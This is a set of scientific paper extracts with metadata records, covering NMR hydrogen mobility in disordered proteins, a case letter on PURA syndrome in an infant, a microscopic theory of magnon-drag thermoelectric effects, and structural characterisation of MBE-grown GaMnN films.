The presented NMR-signals are limited to the lowest temperature of 4.2 K and to room temperature. The proteins lysozyme (T. Verebélyi, et al., to be published) and thymosin β 4 were chosen as examples representing the expected lowest and highest HM values. The spectra of the FID and the solid-echo signals differ only slightly from each other. The spectrum of the FID is somewhat wider as a consequence of the local magnetic fields coming from inhomogeneous proton-proton contributions. Unlike to the data reported earlier, 37 the shape of the spectrum was not Gaussian either at T = 4.2 K or at room temperature ( Figs. 1-4). The spectra could be decomposed into at least two components at both low and high temperatures. The presence of different spectral components indicates the heterogeneity of the proton spin-systems. The relative weights of the components vary with the protein types and the temperatures. The room-temperature narrow-spectrum component was wider than a signal coming from "free" water alone. The other proteins listed in Table 4 show similar behaviors.
The second moments calculated from the spectra and the HM hydrogen mobility parameters are summarized in Table 4; one should remember that the t-indexed parameters apply to whole molecules and indices b and n refer to the two-component resolutions. The two-component spectra and the relevant moments measured at room temperature indicate two types of hydrogen-hydrogen radial vector mobility, characteristic of two individual populations of residues of the molecule. The difference between the very-low-temperature second moment and the room-temperature second moment of the broad component shows that the molecule has no part made up entirely of static hydrogen atoms (immobile proton-proton radial vectors) at elevated temperatures. Even in the solid phase, the mobility HM t (T ) characteristic of the whole molecule is considerably greater for the IDP molecules than for globular lysozyme. In accord, the value of HM t (T ) is presumably in close association with structural disorder of proteins. It is of note that these types of molecular motions do not become frozen in aqueous solutions either. The second moments measured for the protein lysozyme at low and high temperatures ( and , respectively) give the smallest HM t value, which we use as a reference point for globular (structured) proteins. Thymosin β 4 represents the other extremity, which shows the highest proton-proton radial vector mobility. All the experimental data measured by different methods proves the substantial disorder of the molecule. ERD14 also has a high mobility, which is in line with its largely disordered character as a molecular chaperone.
The results on α-synuclein mutants are important from another point of view. HM provides a qualitative measure of distinction, it is model-free and quantitative, which can be related to the function of IDPs. Whereas it is premature to draw general conclusions, this perfectly fits into the current trend of linking quantitative description structural features of IDPs with their function (unstructure-function relationship), it is of further note that proton-proton mobility of α-synuclein point mutants already shows significant differences at the temperature of liquid helium in the case of WT and A53T, in contrast with E46K and A30P. The smaller values for the α-synuclein variants wild-type (WT) and A53T (compared with the two other mutants) can only be explained by assuming that the molecule is not totally rigid even at such low temperatures and they show a mobility of HM t ~0.20. It was presumed that the rigid-lattice second moments of the WT and the other α-synuclein mutants are the same with the value M 2 (He) = 22·10 −8 T 2 (numbers in parentheses, Table 4). This presumption is reasonable as these α-synuclein variants differ from each other in only one amino acid of 141. By the criterion of HM, wild-type and A53T are the most disordered of the four α-synuclein variants, i.e., they have the most dynamic molecular groups (hydrogen atoms). It is of note that earlier NMR data showed a similar behavior on their frozen aqueous solutions, 41 and these differences in behavior seem to have bearing on the effect of familial mutations on local ordering being conducive to their transition to the disease-related amyloid state. The parameter values in parentheses are given for a hypothetical rigid lattice state. The second moment (M 2 ) values are given in 10 −8 T 2 = 1 G 2 units, for the hM x parameters are defined by equation 6. The designations he and RT mean T ~4 K (liquid helium temperature) and room temperature, respectively. The index t refers to the whole spectrum, b stands for the broad while and n for the narrow spectrum component.
Conclusions and Outlook
The hydrogen mobility order parameter HM(T ) proposed here represents the relative missing part of the time-independent (rigid lattice) 1 H NMR second moment coming from the proton-proton dipole-dipole interaction in hydrogen rich molecules, including organic compounds, amino acids and proteins. HM can take values between 0 and 1, characteristic of a rigid lattice and liquid state, respectively, and the actual values are temperature dependent quantities.
In the context of the present study, the term motion is needed for the internal motions of a molecule (not for the translational diffusion of molecules in a liquid), and the time scale is set by the motions visible to NMR. The above results together with the introduction of the order parameter represent a theoretical and practical framework that can guide further investigations and assist in classifying proteins.
It is worthy to address why we chose the order parameter and not the second moment to characterize mobility? To calculate the second moment of a rigid lattice, precise atomic coordinates are needed, which can be obtained only by applying models. In the case of active molecular motions, the details of these motions should also be modeled. It is fair to ask how many parameters should be introduced to interpret a single measured quantity. Molecular motions result in almost twice as many parameters than a rigid system. The hydrogen mobility introduced here provides an overall dynamic attribute, i.e., a model-independent quantitative value, which characterizes the general internal dynamics of the molecule at the actual temperature. It is hard to overemphasize that only two measured quantities are used in the hydrogen mobility factor, namely the reduced second moment measured at the actual temperature and a reference second moment value measured for the rigid-lattice state. It is not at all intended to exclude models as tools to help the interpretation of the measured second moments. For example, the four variants of α-synuclein have almost identical primary structures, yet their NMR spectra and second moments show explicit differences even at T < 10 K.
The knowledge of the measured M 2 (RL) gives significant help in explaining the NMR relaxation times. The coupling constant of the relaxation formalisms (see e.g., Chapter 12 in ref. 9, and Chapter 13 in refs. 10,15, and 45) can be determined directly from the second moment of the rigid lattice. Therefore, not all three of the quantities-coupling constant, activation energy, and correlation time-only the latter two, should be determined from the relaxation time vs. temperature curves. We previously found that the three-parameter fitting of the relaxation time model produces absurd results in the case of the IDPs. 46 The spatial and the temporal averages are immiscible categories for heterogeneous systems such as the protein molecules. and spectrum (right) of lyophilized Tβ4 measured at T = 300 K, ν 0 = 82.4 Mhz. The spectrum was decomposed into a broad rigid lattice line and a narrow motionally narrowed line. The FID shows fast rigid lattice and slow motionally narrowed relaxation accordingly. The second moment (M 2 ) of the spectrum is (6.2 ± 0.1)·10 −8 T 2 , the broad line is of M 2 = (7.0 ± 0.1)·10 −8 T 2 while the narrow line has M 2 = (0.5 ± 0.1)·10 −8 T 2 . The spectral widths are 3.8 ± 0.1 khz, 27.9 ± 0.1 khz, and 0.5 ± 0.05 khz, respectively. (The corresponding shape parameters are 3.8 ± 0.3, 3.0 ± 0.3, and 11.2 ± 0.3, respectively.) estimated errors are given.
Our results prove that the proposed order parameter (HM) for hydrogen mobility is a well-defined physical quantity, which can be experimentally determined in a model-free way for small molecules and proteins alike. Furthermore, it does not involve any speculation or reference to "fitting parameters". HM provides a theoretical and practical framework for the investigation of the correlations between global structural order and internal molecular mobility in solids. It provides a simple yet powerful method for the fast and quantitative distinction between globular and ID proteins. Whereas order parameters of individual resonances have the power of resolving detailed structural features of proteins (globular and ID alike), there is a strong trend in the IDP literature that uses global parameters of structure, disorder, and flexibility for approaching their function. In this sense, the novel parameter fits into the general characterization of IDPs. It even has the power to show quantitative differences between the dynamics of proteins, the sequence of which differ only in one amino acid. It provides a bridge connecting the dynamic properties measured for aqueous solutions and lyophilized proteins. And finally, HM calls attention to the importance of precise measurements and the adequate selection of reference temperatures.
Disclosure of Potential Conflicts of Interest
No potential conflicts of interest were disclosed. | 2018-04-03T00:57:08.324Z | 2013-01-01T00:00:00.000 | {
"year": 2013,
"sha1": "abd47de3209c7a9292b70a1b9514f011d1fb407f",
"oa_license": "CCBYNC",
"oa_url": "https://www.tandfonline.com/doi/pdf/10.4161/idp.25767?needAccess=true",
"oa_status": "HYBRID",
"pdf_src": "PubMedCentral",
"pdf_hash": "abd47de3209c7a9292b70a1b9514f011d1fb407f",
"s2fieldsofstudy": [
"Chemistry",
"Materials Science"
],
"extfieldsofstudy": [
"Chemistry",
"Medicine"
]
} |
226618139 | pes2o/s2orc | v3-fos-license | Growing Spectrum of Episodic Apnea with Hypotonia in a Young Infant
Annals of Indian Academy of Neurology ¦ Volume 24 ¦ Issue 3 ¦ May-June 2021 458 Neurol 2019;26:1137‐e75. 5. Lopez‐Chiriboga AS, Van Stavern G, Flanagan EP, Pittock SJ, Fryer J, Bhatti MT, et al. Myelin oligodendrocyte glycoprotein antibody (MOG‐IgG)‐positive optic perineuritis. Neuroophthalmology 2020;44:1‐4. 6. Biousse V, Trobe JD. Transient monocular visual loss. Am J Ophthalmol 2005;140:717‐21. This is an open access journal, and articles are distributed under the terms of the Creative Commons
Growing Spectrum of Episodic Apnea with Hypotonia in a Young Infant
To the editor, A 48-day-old infant presented with 1-day history of altered breathing pattern and poor feeding of 20 days. Her perinatal period was uneventful. She was a full-term (38 weeks of gestation) first child born to third-degree consanguineous parents with a birth weight of 2.5 kg and head circumference of 31 cm. She was on mixed feeds with early introduction of cow milk owing to poor sucking at the breasts. History of failure to thrive was prominent. At admission, she had two episodes of self-limiting tonic seizures. She was lethargic with the poor state to state variability and irregular breathing pattern. She was afebrile and also underweight (2.25 kg, <-3z), stunted (50.5 cm, <-3z), and microcephalic (32 cm, <-3z Parental screening for pathogenic variation was negative.
The child was initiated on early rehabilitation services and at 3-month follow-up, the child had no further episodes of breathing dysfunction. Reproduction counselling has been offered to the parents.
The list of clinical differential diagnoses for episodic apnea with generalized hypotonia in a young infant is exhaustive. Metabolic disorders like mitochondrial respiratory chain disorders, Leigh's disease, glycine encephalopathy, and citrullinemia; neurotransmitter disorders like aromatic amino acid decarboxylase deficiency; neuromuscular disorders like congenital myasthenia and dystroglycanopathy; structural causes like Joubert syndrome and congenital central hypoventilation syndrome merit evaluation. In addition, the above features can also be seen in a lesser-known developmental encephalopathy due to mutations of purine-rich element binding protein A (PURA) in chromosome 5q entitled "PURA syndrome." [1] The literature on PURA syndrome is sparse and should be suspected in infants with the constellation of 4H comprising hypotonia, hypoventilation, hypothermia, and hypersomnolence. [2] A review of 54 cases by reijnders et al. reported that the earliest presentation is by excessive hiccups in utero and post-term delivery (>41 weeks) as seen in more than 50% of the cases (55%-56%). Hypotonia from birth (96%) is the most common manifestation of the condition leading to feeding difficulties (77%) that may require tube feeding. Hypersomnolence (66%), breathing difficulties that include apneas and congenital hypoventilation (57%), exaggerated startle response (44%), and hypothermia (35%) were the next common clinical features. [1] The association of infantile spasms, myotonia was also reported. [3,4] Older children present with moderate-to-severe intellectual impairment, absent speech, seizures, spasticity, unstable gait, and motor delay. [5] Uncontrolled seizures in some cases may result in loss of achieved milestones mimicking neuroregression. Movement disorders, seizure-like movement, and ataxic movements were reported in 20% of cases. [1] Peripheral neuropathy can occur at a younger age. The hypotonia can also lead to swallowing problems at later age, drooling, and constipation in up to 60% of the cases. Dysmorphic features like higher anterior hairline, myopathic face, full cheeks, and almond-shaped palpebral fissures have been described in cases of PURA syndrome. [1,2] However, the clinical phenotype is nonspecific with no diagnostic criteria, and diagnosis is strictly genetic by exome analysis. A multiorgan screening for structural heart defects, genitourinary abnormalities, strabismus, and hip dysplasia and scoliosis, metabolic and endocrine abnormalities like vitamin D deficiency, hypothyroidism, and short stature is warranted in children with PURA syndrome. Screening in the index child on follow-up was unremarkable. Nonspecific white matter changes and delayed myelination (30%), similar to the index case, are the frequently reported abnormality in MRI neuroimaging. Corpus callosal abnormalities, lateral ventricular widening, mild parenchymal atrophy were also described. [6] Treatment for this condition is largely supportive with the institution of early intervention services.
In conclusion, PURA-related developmental disorders should be suspected in a young infant with generalized hypotonia and episodic apnea. Early recognition is essential to assist in reproductive counselling.
Declaration of patient consent
The authors certify that they have obtained all appropriate patient consent forms. In the form the patient(s) has/have given his/her/their consent for his/her/their images and other clinical information to be reported in the journal. The patients understand that their names and initials will not be published and due efforts will be made to conceal their identity, but anonymity cannot be guaranteed.
Financial support and sponsorship
Nil.
Conflicts of interest
There are no conflicts of interest. | 2020-09-03T09:06:26.335Z | 2020-08-28T00:00:00.000 | {
"year": 2020,
"sha1": "79658440f1eec1f18bd5aab4ca1bea187027db2f",
"oa_license": "CCBYNCSA",
"oa_url": "https://doi.org/10.4103/aian.aian_482_20",
"oa_status": "GOLD",
"pdf_src": "ScienceParsePlus",
"pdf_hash": "4c306750335b7da0d965f304ce842d8c9b1be593",
"s2fieldsofstudy": [
"Medicine",
"Biology"
],
"extfieldsofstudy": [
"Medicine"
]
} |
119196343 | pes2o/s2orc | v3-fos-license | Microscopic Theory of Magnon-Drag Thermoelectric Transport in Ferromagnetic Metals
A theoretical study of the magnon-drag Peltier and Seebeck effects in ferromagnetic metals is presented. A magnon heat current is described perturbatively from the microscopic viewpoint with respect to electron--magnon interactions and the electric field. Then, the magnon-drag Peltier coefficient $\Pi_\MAG$ is obtained as the ratio between the magnon heat current and the electric charge current. We show that $\Pi_\MAG=C_\MAG T^{5/2}$ at a low temperature $T$; that the coefficient $C_\MAG$ is proportional to the spin polarization $P$ of the electric conductivity; and that $P>0$ for $C_\MAG<0$, but $P<0$ for $C_\MAG>0$. From experimental results for magnon-drag Peltier effects, we estimate that the strength of the electron--magnon interaction is about 0.3 eV$\cdot\AA^{3/2}$ for permalloy.
A theoretical study of the magnon-drag Peltier and Seebeck effects in ferromagnetic metals is presented. A magnon heat current is described perturbatively from the microscopic viewpoint with respect to electron-magnon interactions and the electric field. Then, the magnon-drag Peltier coefficient Π mag is obtained as the ratio between the magnon heat current and the electric charge current. We show that Π mag = C mag T 5/2 at a low temperature T ; that the coefficient C mag is proportional to the spin polarization P of the electric conductivity; and that P > 0 for C mag < 0, but P < 0 for C mag > 0. From experimental results for magnon-drag Peltier effects, we estimate that the strength of the electronmagnon interaction is about 0.3 eV·Å 3/2 for permalloy.
KEYWORDS: Peltier effect, Seebeck effect, magnon drag, spin caloritronics, spintronics, spin current, electronmagnon interaction Understanding interactions between spin dynamics and transport phenomena in ferromagnetic materials is one of the central issues in spintronics and spin caloritronics. 1) In particular, it is important to clarify the thermal properties of spin dynamics, that is, magnon scattering mechanisms, at finite temperature. The magnon-drag thermoelectric effects proposed by Bailyn 2) are good subjects for investigating the thermal properties and transport phenomena of magnons because the effects are determined by substance-specific properties 3) and are sensitive to external magnetic fields. Moreover, the effects are useful in the study of fundamental electron-magnon interactions. Blatt et al. 4) reported that the Seebeck coefficient S for iron takes a maximum value near 200 K, that S is unresponsive to doping with heavy atoms and annealing, and that S is well fitted by the form S = C 1 T + C 2 T 3/2 (where C 1 and C 2 are constants). These differ from the features expected for phonon-drag Seebeck effects 3) both quantitatively and qualitatively. Grannemann and Berger 5) phenomenologically derived a convenient expression for the magnon-drag Peltier coefficient in ferromagnetic metals, assuming that the drift velocity of magnons, v mag , is proportional to the drift velocity of electrons (i.e., v mag = ηv e ), where D is the spin-wave stiffness constant, e > 0 is the elementary charge, n e is the number of conduction electrons per unit volume, V is the volume of the system, n(x) := [exp(x/k B T ) − 1] −1 is the Bose-Einstein distribution function, k B is the Boltzmann constant, T is the absolute temperature, and ω q is the energy dispersion relation for magnons. By using this expression, they found that at low temperature, Π η mag ∝ T 5/2 , and that consequently, the magnon-drag Seebeck coefficient S η mag = Π η mag /T ∝ T 3/2 . In addition, by fitting eq. (1) to experimental data, they obtained the values η = 2.98 for Ni 69 Fe 31 and η = 2.20 for Ni 66 Cu 34 . Recently, Costache et al. 6) have developed a magnon-drag thermopile that can cancel out all contributions except for that of magnons to * E-mail address: dmiura@solid.apph.tohoku.ac.jp thermopower, allowing the electric voltage induced by the magnon-drag Seebeck effect to be measured directly. They found that the Seebeck coefficient of a magnon-drag thermopile made of permalloy takes a peak near 180 K and is well fitted to Π η mag /T at temperatures below 180 K (η = 3). As above, the phenomenological expression (1) can accurately describe the experimental results. However, there has been no progress on the theoretical front for understanding magnondrag thermoelectric effects from the microscopic viewpoint.
In this letter, we describe magnon-drag thermoelectric phenomena in ferromagnetic metals at the microscopic level and aim to obtain detailed information on the magnon-drag thermoelectric coefficients. We calculate a magnon thermal current driven by an electric field using the Keldysh Green function technique. The mathematical form of the resultant magnon-drag Peltier coefficient conforms to Grannemann and Berger's expression (1) and a microscopic expression for η is obtained. Furthermore, we show that η, a physically important feature, is proportional to the spin polarization of the electric conductivity.
Let us consider a Hamiltonian describing ferromagnetic where c kσ is an operator that annihilates the σ spin electron with an wave vector k, ε kσ := 2 k 2 /2m − σ∆/2 − µ is the energy dispersion relation for electrons calculated from the chemical potential µ, m is the mass of an electron, ∆ stands for the exchange splitting, b q is an operator that annihilates a magnon with an wave vector q, and H em is an electron-magnon interaction defined by [7][8][9] where I represents the strength of the electron-magnon interaction. The interaction with a static homogeneous electric field E := −d A(t)/dt is given by H ′ (t) := − j e · A(t)V in terms of the electric charge current density operator j e := −(e /mV) kσ kc † kσ c kσ . We define the space-averaged magnon heat current density operator by where operators are in the Heisenberg representation with respect to H + H ′ (t). Using the lesser function 10,11) , the statistical average of j mag (t) can be represented by where · · · is a statistical average in H + H ′ (t) when H ′ (t) is regarded as the nonequilibrium part. We perform the lowestorder calculation for j mag (t) with respect to both H em and H ′ (t) as shown in Fig. 1. In energy space, we have where ∆D < q (ω + , ω − ) corresponds to the diagrams shown in Fig. 1 and is given by where ω ± := ω ± Ω/2, E ± := E ± Ω/2, A(Ω) := dt e iΩt/ A(t), and g kσ (E) and d q (ω) are the unperturbed Keldysh Green functions of the σ spin electron with the wave vector k and the magnon with the wave vector q, respectively. Taking the lesser component, we obtain , and d a q (ω) and d r q (ω) are the unperturbed advanced and retarded Green's functions of the magnon, respectively. The part representing the electron-hole pair is, in the first order of Ω, calculated as factor −d f (E)/dE acts on the Green's functions of the electron approximately like the Dirac's delta function δ(E) under the condition δ ≫ k B T . This approximation is valid at temperatures below about 100 K because δ is on the order of 10 −2 eV in metals. Considering only the contribution of the σ spin electrons to the Fermi surface |k| = |k Fσ | and the longwavelength region 2 k Fσ · q/m(ω − ∆) ≪ 1, we obtain where σ σ := (πe 2 3 /3m 2 V) k k 2 ρ kσ (0) 2 is the spindependent electric conductivity, 12) and we use the identi- . Using eqs. (2) and (3), we have where j c := (σ ↑ + σ ↓ )E is the electric charge current and P := (σ ↑ −σ ↓ )/(σ ↑ +σ ↓ ) is the spin polarization of the electric conductivity. As a result, we obtain the magnon-drag Peltier , y, z). This result indicates that the magnon-drag Peltier coefficient is proportional to the spin polarization. To evaluate the ω integral, we express the self-energy of the magnon in terms of the Gilbert damping constant α as 13) Considering a low-energy region ω q < k B T in the q summation and assuming α ≪ 1 and ∆ ≪ δ/α, we obtain A comparison between eqs. (4) and (1) affords the following microscopic expression for the phenomenological parameter η: Grannemann and Berger 5) have experimentally obtained η = 2.98 for Ni 69 Fe 31 using n e = 3.1 × 10 −2 Å −3 in eq. (1). Putting these values into eq. (5), we can estimate the strength of the electron-magnon interaction to be I = 0.3 eV·Å 3/2 by using typical values for ferromagnetic metals: ∆ = 0.1 eV, 14) P = 0.5, 14) δ = 0.01 eV, 15) and α = 0.01. 15) Equation (4) could also be useful for determining the sign of P by a comparison with the experimental data. When ω q = Dq 2 + ∆ gap , eq. (4) can be written in the form Since C mag can be determined experimentally by fitting a function with respect to T to the temperature dependence of the Peltier coefficient, we can evaluate the sign of P, that is, P > 0 for C mag < 0 and P < 0 for C mag > 0. This is analogous to the situation where the type of charge carriers in semiconductors can be determined by Peltier or Seebeck measurements.
Finally, we refer to a microscopic description for Seebeck effects. The magnon-drag Seebeck effect is the counter phenomenon of the magnon-drag Peltier effect. Therefore, it is expected that the two effects will satisfy Onsager's reciprocity relation, that is, the magnon-drag Seebeck coefficient must be given by S mag = Π mag /T . The first work to microscopically describe a response to a temperature gradient was that of Luttinger. 16) Following that approach, we can describe Seebeck effects by introducing a Hamiltonian drh(r)φ L (r, t), where h(r) is a total Hamiltonian density operator and φ L (r, t) is a pseudoscalar potential. In other words, we calculate the response of the nonequilibrium electric charge current to the Hamiltonian, and then replace ∇φ L (r, t) with (∇T )/T . However, here we consider the Hamiltonian − j mag · A L (t)V instead of drh(r)φ L (r, t) from an analogy with the fact that the product of the charge density and the scalar potential corresponds to the product of the charge current density and the vector potential. Thus, we regard as a Hamiltonian describing a static homogeneous temperature gradient, and we assume that d A L (t)/dt corresponds to (∇T )/T as E is given by −d A(t)/dt. This Hamiltonian has some advantages: First, the diffusion ladder arising from short-range impurity scattering vanishes for a static homogeneous temperature gradient. Second, it is easy to see that the Seebeck coefficient is associated with a charge currentenergy current correlation function 17) because − j mag · A L (t)V has the same form as the Hamiltonian − j e · A(t)V that we used to account for the static homogeneous electric field. Considering the lowest-order contribution shown in Fig. 2, we obtain the magnon-drag electric charge current j e mag as Through similar calculations as above, we obtain As a consequence, we can confirm that Onsager's reciprocity relation S mag = Π mag /T is reproduced by using the relation d A L (t)/dt → ∇T/T and the definition of the Seebeck coeffi-cient j e mag =: −σS mag ∇T . In summary, we have shown that Π mag = C mag T 5/2 and S mag = Π mag /T = C mag T 3/2 at a low temperature T from the microscopic viewpoint, and that the coefficient C mag is proportional to the spin polarization P of the electric conductivity. Moreover, from a comparison with experimental results for magnon-drag Peltier effects, we estimate that the strength of the electron-magnon interaction is about 0.3 eV·Å 3/2 for permalloy. | 2012-10-29T13:04:25.000Z | 2012-09-04T00:00:00.000 | {
"year": 2012,
"sha1": "8053a1fd8071cc111742883bdbdb0889e4733961",
"oa_license": null,
"oa_url": "http://arxiv.org/pdf/1209.0685",
"oa_status": "GREEN",
"pdf_src": "Arxiv",
"pdf_hash": "8053a1fd8071cc111742883bdbdb0889e4733961",
"s2fieldsofstudy": [
"Physics",
"Materials Science"
],
"extfieldsofstudy": [
"Physics",
"Materials Science"
]
} |
53472661 | pes2o/s2orc | v3-fos-license | Structural characterisation of MBE grown zinc-blende Ga1-xMnxN/GaAs(001) as a function of Ga flux. In: Microscopy of semiconducting materials: proceedings of
: Ga 1-x Mn x N films grown on semi-insulating GaAs(001) substrates at 680°C with fixed Mn flux and varied Ga flux demonstrated a transition from zinc-blende/wurtzite mixed phase growth for low Ga flux (N-rich conditions) to zinc-blende single phase growth with surface Ga droplets for high Ga flux (Ga-rich conditions). N-rich conditions were found favourable for Mn incorporation in GaN lattice. α-MnAs inclusions were identified extending into the GaAs buffer layer.
INTRODUCTION
III-V ferromagnetic semiconductors are of interest because of their potential application within spintronic device structures (Wolf et al 2001). Theoretical prediction of the Curie temperature for various semiconductors (Dietl et al 2000) suggests that a T C value above room temperature is possible for zinc-blende GaN containing 5 at% Mn and a hole concentration of 3.510 20 cm −3 . In view of the limited solid solubility of Mn in GaN, it becomes necessary to use non equilibrium growth techniques such as plasma-assisted molecular bean epitaxy (PAMBE) to establish appropriate conditions for the growth of uniform Ga 1-x Mn x N alloys. To date, high p-type Ga 1-x Mn x N layers with carrier concentrations exceeding 10 18 cm -3 have been obtained by PAMBE (Novikov et al 2004).
Earlier work on the growth of zinc-blende GaN suggests that exact control of the III:V ratio close to the stoichiometric condition allows the production of single phase zinc-blende epitaxial layers, whilst deviation to Ga or N-rich conditions reportedly produces mixed zinc-blende and wurtzite material Giehler et al 1995;Ruvimov et al 1997). More recently, various Mn-N or Ga-Mn-N precipitations have been reported for wurtzite GaN epilayers grown on sapphire substrates (e.g. Kuroda et al 2003 andNakayama et al 2003).
In this paper, the influence of the Ga:N ratio on the microstructural development of Ga 1- x Mn x N/GaAs(001) grown by PAMBE is assessed using a variety of complementary analytical techniques.
EXPERIMENTAL
Zinc-blende Ga 1-x Mn x N epilayers were grown on semi-insulating (001) oriented GaAs substrates at 680°C by PAMBE. Briefly, a GaAs buffer layer of thickness ~0.15µm was deposited to provide a clean surface for epitaxy. Following initiation of the N plasma, the Mn and N shutters were opened whilst the As shutter was closed. The Mn flux was fixed at a level of 1.010 -8 mbar while the Ga:N ratio was varied by changing the Ga flux from 7.510 -8 mbar to 1.2x10 -6 mbar. This Published in Springer Proceedings in Physics, Springer-Verlag Springer Proc. Phys. 107 (2005) pp 155-158 Microscopy of Semiconducting Materials Conference XIV, MSM 2005 corresponded to a transition from N-rich to Ga-rich conditions, with the latter being identified by the development of Ga droplets on the growth surface. An overall chamber pressure of 2-310 -5 mbar was maintained by a flow of N 2 . The growth conditions for the sample set are summarised in Table 1.
The bulk and fine scale defect microstructure of each sample was assessed. A Philips X-pert Diffractometer was initially used to assess the bulk crystal structure of the deposited epilayers. The complementary technique of reflection high energy electron diffraction (RHEED) using a modified Jeol 2000fx transmission electron microscope, with as-grown or HCl etched specimens mounted vertically, immediately beneath the projector lens, was then applied to appraise the sample near surface microstructure. Sample morphology was assessed using an FEI XL30 scanning electron microscope operated at 15-20kV. Samples for TEM investigation across the stoichiometric range were prepared in plan-view and cross-sectional geometries using sequential mechanical polishing and argon ion beam thinning. Samples were assessed using conventional diffraction contrast techniques using Jeol 2000fx and 4000fx instruments and energy dispersive X-ray (EDX) analysis using an Oxford Instruments ISIS system.
RESULTS AND DISCUSSION
The formation of zinc-blende Ga 1-x Mn x N was confirmed by XRD spectra obtained across the sample set. Variation in the full width at half maxima (FWHM) values for the 002 reflection across the stoichiometric range (Table 1) suggests that the layer structural quality becomes optimised for conditions of slightly Ga rich growth. However, no evidence for the presence of second phase wurtzite material was discerned for any of the spectra. As observed using SEM, the sample grown closest to ~1:1 stoichiometric conditions appears specular, indicative of a smooth surface. Samples grown under N-rich conditions appear to exhibit a slightly rougher surface, whilst samples grown under Ga-rich conditions showed increasing amounts of Ga droplets on the sample surface with increasing Ga flux.
RHEED patterns recorded along <110> projections for samples A, D and G are presented in Fig. 1(a-c). It is noted that clear, sharp spots was only obtained for the Ga-rich samples after removal of surface Ga droplets using boiling HCl. All the samples demonstrated the cubic structure with extra spots and/or streaks indicating varying degrees of mixed phase growth and stacking disorder on inclined {111} planes. In particular, a transition from mixed hexagonal/cubic (α/) phase growth for N-rich conditions to single phase cubic material for Ga-rich conditions was observed (as distinct from the previous indications of XRD).
By way of example, for sample A grown under N-rich conditions, dominant diffraction spots from both cubic and hexagonal material were identified (Fig. 1a). The indexing of Fig. 1a is clarified with reference to the schematic diagram of Fig. 1d which illustrates the orientation relationship between the two phases, with <110> // <11 2 0> and {111} // {0001} . It is noted that the extra spots due to the hexagonal phase became faint with increasing Ga flux, disappearing when the Ga:N ratio approached 1:1 stoichiometry (Fig. 1b).
For samples grown under N-rich conditions and ~1:1 stoichiometry, streaks preferentially aligned along one <111> direction were also observed, indicating the preferential alignment of planar defects (i.e. thin microtwins and stacking faults) inclined to the growth surface on just one set of {111} planes (Figs 1 a and b). Similar streaks were observed along both <111> directions for samples grown under Ga-rich conditions, again attributable to a high density of inclined planar defects (Fig. 1c). It is noted that samples grown under N-rich and nearly 1:1 stoichiometric conditions exhibited strong anisotropy in the distribution of planar defects, being present for just one <110> sample projection, whilst samples grown under Ga-rich conditions exhibited planar defects for both orthogonal <110> and <110> sample projections. This variation in the anisotropic distribution of planar defects suggests that this effect is associated with the transition from N-rich to Ga-rich growth, i.e. due to differences in III:V stoichiometry at the growth surface during the process of epilayer nucleation, rather than being due to slight vicinality of the substrate surface. In addition, the presence of streaks perpendicular to the shadow edge of samples grown under Ga-rich conditions (Fig. 1c), following HCl etching, are attributed to patches of relatively smooth surface. More precisely, however, the diffraction effect of streaks perpendicular to the growth surface is attributed to the material that is not perfectly flat, but with slight local misorientations combined with some degree of surface disorder (Cowley 1992).
Overall, the indication from these RHEED patterns together with XRD spectra and SEM observation is that nearly 1:1 stoichiometry (or slightly Ga-rich conditions) correspond to an optimised microstructure. Fig. 1e shows a centred dark field image formed from a diffraction spot attributed to only wurtzite Ga 1-x Mn x N, as distinct from a overlap of spots due to wurtzite Ga 1-x Mn x N and microtwin spots from the zinc-blende Ga 1-x Mn x N located at 1/3<111> positions. This indicates the localisation of small grains of wurtzite Ga 1-x Mn x N at the growth surface. However, the overlap from stacking fault streaks through the objective aperture, due to slight imaging beam convergence, also contributes to this dark field image, partially highlighting the stacking disorder on one set of {111} planes. Since selected area diffraction experiments provided no evidence for the presence of wurtzite domains through the bulk of the epilayer and no evidence was found for hexagonal phase material at the epilayer/substrate interfaces, the formation of wurtzite Ga 1-x Mn x N are attributed to a cool down effect at the end of growth whereby a slight change in surface stoichiometry might have occurred under Nrich conditions, allowing small grains of the more stable hexagonal phase to be established. The small volume fraction of these surface hexagonal grains explains why there were not detectable by XRD.
EDX measurements from the epilayers during TEM observation indicated a variation in the Mn content across the sample set, with a relatively uniform Mn content of ~3.3at% for sample A, peaking at a value of 40.3% for sample D, while the Mn content was below the detectability limit of EDX for samples grown under Ga rich conditions. This is consistent with reports of MBE grown wurtzite Ga 1-x Mn x N/sapphire which demonstrate that N-rich (and Mn-rich) conditions are required for the successful incorporation of Mn into the crystal lattice (Haider et al 2003;Kuroda et al 2003), as assessed using EDX and SIMS respectively.
By way of illustration, Fig. 2a presents a dark field image of Sample A, demonstrating the highly faulted nature of the epilayer, and pyramidal precipitates (arrowed) extending into the GaAs buffer layer. EDX measurements confirmed the presence of Mn and As within such inclusions (Fig. 2c), whilst associated selected area electron diffraction patterns (Fig. 2b) confirmed that the inclusions comprised α-MnAs. The indexing of Fig. 2b is clarified with reference to the schematic diagram of Fig. 2d. The orientation relationship here between α-MnAs and GaAs is given by <11 2 0> MnAs // <110> GaAs and {0001} MnAs // {111} GaAs . It is emphasised that such MnAs inclusions extending into the buffer layer were identified within all the samples with decreasing size upon transition to Ga-rich growth conditions. No evidence for Ga-Mn-N or Mn-N inclusions was found in these samples. In view of the very different levels of hardness of the epilayer and substrate, it is considered that voids present within the GaAs buffer layer as marked in Fig. 2a arise due to preferential ion beam milling of localised strain centres. However, some co-operative mechanism associated with MnAs precipitate formation during the process of growth might also be implicated in their initial formation.
In summary, N-rich conditions are required for the incorporation of Mn within Ga 1-x Mn x N, whilst slightly Ga-rich conditions are associated with optimised structural properties. All samples exhibited MnAs inclusions extending into the GaAs buffer layer, arising from the limited solid solubility of Mn in GaN. | 2018-10-19T13:40:19.705Z | 2005-01-01T00:00:00.000 | {
"year": 2005,
"sha1": "29a31d2e246b1a11c4b12333efa4d291655f620a",
"oa_license": "CCBY",
"oa_url": "https://nottingham-repository.worktribe.com/preview/1020402/Springer_Proc._Phys._107_(2005)_pp_155-158.pdf",
"oa_status": "GREEN",
"pdf_src": "ScienceParsePlus",
"pdf_hash": "a0c720510713eec363f672e6ff42d6e8b59b5f98",
"s2fieldsofstudy": [
"Materials Science",
"Engineering",
"Physics"
],
"extfieldsofstudy": [
"Materials Science"
]
} |
117921137 | pes2o/s2orc | v3-fos-license | Retrofitting a Building ’ s Envelope : Sustainability Performance of ETICS with ICB or EPS
